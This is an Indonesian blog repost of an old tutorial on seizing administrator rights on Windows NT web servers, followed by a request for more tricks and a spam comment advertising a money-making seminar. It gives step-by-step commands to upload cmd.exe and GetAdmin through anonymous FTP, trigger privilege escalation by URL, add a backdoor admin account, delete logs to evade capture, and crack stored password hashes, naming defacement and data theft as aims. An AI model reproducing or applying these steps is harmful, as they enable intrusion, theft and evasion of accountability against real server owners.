Teknik Menjadi Admin Pada Windows NT

July 5, 2009 at 3:46 am 2 comments

Teknik Menjadi Admin Pada Windows NT
Oleh HvD-79
Published: Juli 8, 2002
Print
Wah lagi-lagi sistem operasi windows nih yang jadi korban.Kali ini korban kita adalah Sistem Operasi Windows NT. <— yang udah bosan dan tahu hentikan bacaan anda sampai disini.
 Itulah gambaran kelemahan dari OS Windows, begitu banyak  kalangan IT yang telah mengetahuinya selain mudah untuk di Crack sistem operasi ini juga sering menjadi santapan  para Script Kiddies dan kabarnya lagi sistem operasi ini  menjadi server favorite bagi para Hacker, karena sistem ini  sangat gampang untuk dikerjain ( he.he..bukan berarti gue nyarankan lu semua jadi Cracker ~
 Seperti halnya kasus bug Unicode dan CodeRed yang telah  menimbulkan bencana besar terhadap server yang berjalan  pada sistem operasi windows diseluruh dunia. Maka para  admin yang menjalankan sistemnya pada paltform windows ini  menjadi kalang kabut bagaikan kambing kebakaran jenggot  (mbeee.mbeee..mbeeeeee <– aduh kacian nih..).
 Oke ini hanyalah gambaran dari kasus-kasus yang pernah  melanda server yang menggunakan Platform Sistem Operasi  windows.
 Sekarang marilah kita menjadi penguasa tunggal pada server  windows NT, mau tahu caranya ? gampang, namun sebelumnya  ikuti dulu sponsor berikut ini:
 ” PENULIS TIDAK BERTANGGUNG JAWAB ATAS DAMPAK YANG DITIMBULKAN OLEH  TUTORIAL INI ”
 Adapun langkah-langkah persiapan melakukan Crack pada SO windows NT  adalah sbb:
==========================
 1. Kamu harus memiliki PC (personal Computer) yang  terkoneksi ke Internet.
 2. Sistem operasi yang digunakan sebaiknya menggunakan SO yang sama  dengan korban ( OS Windows NT) kenapa harus menggunakan SO ini..?  Karena dengan sistem ini nantinya  kita akan gampang untuk mengupload file CMD.EXE dari PC  kita dan file ini nantinya akan kita perlukan saat  melakukan Crack.
 3. Tools-tools pendukung seperti program GetAdmin.exe dan Gasys.dll.
 4. Browser seperti IE , Netscape dan NeoPlanet ( NeoPlanet  adalah Browser yang digunakan penulis).
 Oke setelah persiapan diatas terpenuhi sekarang kita akan melakukan  tahap berikutnya yaitu tahap Cracking pada sistem operasi windows NT  yang mana tujuan akhir kita adalah untuk mendapatkan password  administratornya. Dimana dengan mendapatkan password dari admin ini  maka kita akan dapat melakukan apa saja dengan server korban, seperti  deface, pencurian data, pencurian password client, dll.
 Berikut adalah tahap-tahap dalam melakukan cracking .
============================================
Â
 1.Jalankan MS-DOS prompt.
 2.Siapkan target yang ingin anda crack, anda dapat  mencarinya dengan bantuan search engine seperti google, yahoo, exite,  altavista, dan lain-lain. (penulis sendiri lebih senang menggunakan  scan engine Operasi Sistem seperti netcraft ).
 3. Jalankan FTP anda dengan koneksi tujuan adalah server  target dan alangkah baiknya bila anda memiliki program port  scanner, karena kita akan mengetahui apakah terget kita  akan menjalan kan servis FTP atau tidak.  Dan dengan menggunakan program port scanner ini anda dengan  mudah nantinya menentukan port-port berapa saja yang  terbuka
 contoh beberapa port dan nama mesin pengunaan:
———————- ———————————————-
 Port: Mesin yang bekerja:
====================
 21 ftp
 22 ssh
 23 telnet
 80 http
====================
Â
 Contoh command dalam melakukan ftp :
 C:\ftp http://www.hvd-79.com maka ada pesan :
 Connected to http://www.hvd-79.com 220 medinet microsoft FTP
 Service (version 3.0)
 User(www.hvd-79.com : (none)): Anonymous (Enter)
 Anonymous accses allow, send identify (email name) as
 password:
 Koneksi ini menjelaskan bahwan nama NetBios dari server adalah  medinet. Dan dari sini kita juga akan tahu nama account dari user  adalah Anonymous yang digunakan oleh windows NT untuk menjalankan  mesin seperti FTP, WWW dan Ghoper pada server tersebut.
 Bila saja admin sebelumnya belum pernah mengganti account  default pada server tersebut, maka user account internet  Anonymousnya adalah IUSR_SATURN.
 Sedangkan untuk passwordnya kita hanya perlu memasukan nama  email kita atau bisa juga nama email yang kita ciptakan  sendiri (coba aja admin@hvd-79.com).
 Setelah perintah diatas anda isi semua maka anda sudah  diizinkan untuk login pada direktori FTP anda dan silahkan  mencoba command cd, dir, untuk masuk dan melihat isi  didalam suatu direktori sedangakan perintah put biasanya  digunakan oleh para Cracker untuk mengupload atau meletakan  trojan pada server korban.
==============================================
 Berikut ini saya sertakan juga daftar command yang bisa  anda gunakan pada ftp:
==============================================
 ! delete literal prompt
 send
 ? debug ls put
 status
 append dir mdelete pwd
 trace
 ascii disconnect mdir quit
 type
 bell get mget quote
 user
 binary glob mkdir recv
 verbose
 bye hash mls remotehelp
 cd help mput rename
 close lcd open rmdir
===========================================
 Namun disini kita juga harus memahami bahwa tidak semua perintah ftp  dapat anda gunakan seperti command “put” command ini pada umumnya  dibatasi penggunaannya sebab si Admin yang pintar tidak akan   mengijinkan accses write untuk user Anonymous dan bila ini kita  paksakan maka hasilnya adalah ” acces denied “. Terkadang disini admin  yang kurang memperhatikan allow setting servernya maka kita akan  dizinkan untuk mengupload file apa saja yang kita inginkan.
 Selanjutnya jika anda menemukan direktori cgi-bin maka ini  adalah suatu keberuntungan. Segeralah masuk ke direktori  cgi-bin tersebut dan siapkan file transfer tipe binary dan  cobalah mengupload file CMD.EXE dari disk anda.
 Contoh perintahnya sebagai berikut:
============================
 ftplcd c:\winnt\system32\
 Local directory now C:\winnt\system32\.
 ftpput cmd.exe
 226 transfer complate
 208144 byte sent in 0,05 second (4639,7 byte/sec)
 Kemudian lakukan hal yang sama untuk mengupload file getadmin.exe dan  gasys.dll pada direktori yang sama yaitu cgi-bin.
 ftplcd c:\winnt\system32\
 Local directory now C:\winnt\system32\.
 ftpput getadmin.exe
 226 transfer complate
 dan
 ftplcd c:\winnt\system32\
 Local directory now C:\winnt\system32\
 ftpput gasys.dll
 226 transfer complate
 Setelah semuanya selesai anda upload sekarang kita beralih  ke browser dan ketikanlah link dibawah ini:
 http://www.hvd-79.com/cgi-bin/getadmin.exe?IUSR_MEDINET
Â
 setelah beberapa menit kemudian akan muncul pesan cgi-error dan pada  tampilan error tersebut terdapat tambahan :
 CGI-ERROR
 congratulation , now account IUSER_MEDINET have  administrator rights.
 Nah sekarang ini artinya account Anonymous anda telah berpangakat sama   dengan administartor lokal. Dengan  demikian maka anda dapat melakukan apa saja terhadap  server yang anda crack tersebut seperti yang saya contohkan tadi  (melakukan deface, pencurian data, pencurian password client dll).
 Namun untuk menjaga account anda agar tetap awet maka anda saya  sarankan untuk membuat accout sendiri , kamu bingung dan tak tahu  caranya..? gampang kok..
 Untuk membuat account baru pada IE anda inilah contohnya :
===============================================
 Dimana contoh : User= ntbaruku dan Password = hvd-79 maka ketikanlah  link anda seperti dibawah ini:
http://www.hvd-79.com/ cgi-bin/ cmd.exe?/c+ c:\winnt\system32\net.exe+ ntbaruku+hvd-79+/add
 dan untuk membuat anda sebagai administrator ketiklah pada browser  anda sebagai berikut :
 http://www.hvd-79.com/cgi-bin/getadmin.exe?ntbaruku
 Kemudian clik tombol start dan melalui find cari komputer dengan nama  http://www.HvD-79.com setelah komputer tersebut ditemukan clik kanan mouse  anda dan klick explore maka pada saat itu pula akan muncul pertanyaan  untuk User dan Password maka isikanlah dengan ( ntbaruku dan hvd-79 )  sebagai user dan passwordnya.Dengan langkah ini maka anda  telah menjadi admin benaran.
 Upss.. tapi anda jangan senang dulu masih ada pekerjaan  yang sangat penting yang harus anda lakukan, pekerjaan  apakah itu ? Menghilangkan jejak, ya bila anda ingin  menjadi seorang hacker handal anda tidak boleh ceroboh  karena setiap perintah yang anda ketikan tadi sewaktu  melakukan cracking maka logfiles anda akan tertinggal  disana dan ini akan membahayakan diri anda sendiri sebab  nomor IP anda akan di rekam disana dan ini dapat  dimamfaatkan kembali oleh Admin yang sesungguhnya untuk  menuntut serta menangkap anda atas perbuatan penyusupan dan  perusakan sistem mereka.
 Namun berhubung anda telah menjadi seorang Admin maka  segeralah menghapus files-files yang tadi anda upload pada  direktori cgi-bin yaitu file cmd.exe, getadmin.exe dan  gasys.dll karena anda tidak membutuhkannya lagi.
 Tindakan penghapusan files-files tadi adalah untuk  memastikan jejak anda tidak tertinggal disana yaitu adanya  files (cmd.exe, getadmin.exe dan gasys.dll) pada direktori  cgi-bin. Dan untuk menghilangkan seluruh logfiles anda yang  tertinggal masuklah kedirektori winnt\system32\logfiles  <– segera hapus jejak anda yang tertinggal.
 Berikutnya kita juga dapat melakukan cracking dengan  seluruh accout client yang tersimpan pada informasi SAM  (security Account Manager) yang terdapat pada server target  dengan menggunakan program seperti l0phtcrack namun karena  keterbatasan waktu penulis hanya membahas sampai disini.
 Oke sebagai saran penutup penulis mengakui tutorial ini  masih memiliki banyak kekurangan jadi bila ada saran atau kritikan anda bisa menghubungi penulis lewat email : x-d@plasa.com
Â
 Regard
 By. HvD-79

Â

 Referensi : – “Kejahatan Internet Trik Aplikasi dan Trik  Penaggulangannya” oleh R.Kresno Aji, Denny Siswanto dan Tommy Chandra  Wiratama. Penerbit PT.Elex Media Komputindo Kelompok Gramedia,  Jakarta (c) 2002.
 – Pengalaman pribadi penulis saat melakukan hacking.
 – “Cracking windows NT” http://www.neworder.box.sk .
 Tools : Anda dapat mencari melalui internet dengan menggunakan search  engine (yahoo, google, exite, altavista  dll) dengan kata kunci “download GetAdmin.exe “,  “download Gasys.dll” atau “download l0pthcrack”. Bila anda  sulit untuk mendapatkannya silahkan  hubungi penulis melalui email diatas.
 NB: Mohon maaf bila sudah ada tutorial yang mendahuluinya  penulis hanya ingin berbagi pengetahuan untuk kemajuan  kalangan IT khususnya di Indonesia.  Penulis juga masih mengambil sebagian besar sumber  tulisan ini dari berbagai media baik dari Buku Mengenai  Security dan Internet serta pengalaman pribadi penulis.
 ” NO BODY PERFECT IN THE WORLD ”
Â
 Credits : R.Kresno Aji, Denny Siswanto,Tommy Chandra  Wiratama and all “NewOrder Crew”
 Greetz to : Jhon_angga, BSD-os,AcCezZdeNieD ,_dRaft_, AxaL,  |D|E|D|Y|, edo^dido , bede’, kerinduan, gunungbatu,  mafiaBatak, spiderlink  (Sorry friend bila nick anda belum sempat  dibuat kemungkinan aku lupa cara nulisnya) and all crew of  #hackingcentre, #ganknet, #31@ and #minangcrew in IRC dalnet.  Special dedicated to my darling ” uptown^girl^ ” i will  always love you honey. .
Â

Entry filed under: komputer. Tags: , .

Rahasia Kuno Melewati Scanner AntiVirus Trik Jitu Ampuh Menghadapi Billing Explorer

2 Comments Add your own

  • 1. bentengdigital.com  |  September 15, 2009 at 4:15 am

    Thanks buat sharing nya
    Btw punya trik serupa yang buat Windows 2003 bro?

    Reply
  • 2. rhn_BTHO  |  October 23, 2009 at 6:37 am

    Assalamu’alaikum warahmatullahi wabarakatuh dan salam sejahtera.. .
    Di sini ingin ana uar-uarkan satu seminar e-Pendidikan yang di adakan secara “PERCUMA” untuk mereka-mereka yang ingin merubah 360 darjah taraf pendidikan anak-anak bangsa kita [bermula dari Darjah 1 sehinggalah Tingkatan 5]. Seminar tersebut di adakan di alamat seperti berikut:
    ZRB Millionaires Club,
    Suite 26-1,
    Jln 3/146 Metro Business Centre,
    Bandar Tasik Selatan,
    57100 Kuala Lumpur.

    .. stp hari khamis pkl 8.30mlm – 10.30mlm..

    .. cpt3.. tmpt thd.. sms nama, alamat dan no. tel ke +6012-664 3047 skrg..

    untuk pengetahuan saudara/saudara, seminar ini juga berpotensi untuk menjana pendapatan. cubalah datang dan tengok sendiri.. bkn omong kosong tetapi ingin membantu dengan ikhlas siapa-siapa yg ingin merubah kehidupan mereka setelah bosan kerja makan gaji jer.. berminat nk tahu lanjut sms dulu sebelum datang.

    sekian terima kasih.
    wassalam

    Kata Hikmat Prof. Dr. Hamka
    “Peluang yang besar itu datang secara TIBA-TIBA… datang TIDAK MENENTU MASA… datang disaat kita KESEMPITAN atau KESUSAHAN. Nilailah peluang itu dengan BIJAKSANA.
    REBUTLAH peluang yang besar itu kerana peluang yang besar itu boleh berlalu dengan secara tiba-tiba. Jangan jadikan SERIBU ALASAN untuk tidak merebut peluang yang besar itu.”

    http://www.scorea.com/eng/foa/notice.htm

    Reply

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Trackback this post  |  Subscribe to the comments via RSS Feed


Categories

Recent Posts


%d bloggers like this: